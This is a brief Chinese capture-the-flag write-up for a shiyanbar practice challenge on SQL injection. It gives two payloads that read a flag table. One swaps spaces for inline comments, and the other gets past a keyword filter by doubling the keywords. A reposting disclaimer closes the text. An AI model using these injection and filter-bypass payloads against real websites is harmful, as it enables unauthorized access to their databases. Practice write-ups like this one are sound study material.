题目链接:http://ctf5.shiyanbar.com/423/web/
简单的SQL注入之1,比2,3都简单一些。利用2 的查询语句也可以实现:1'/**/union/**/select/**/flag/**/from/**/web1.flag/**/where/**/'1'='1
经测试,简单的SQL注入1 过滤了关键字,重复写即可绕过,如:1' unionunion selectselect flag fromfrom web1.flag wherewhere '1'='1
免责声明!
本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。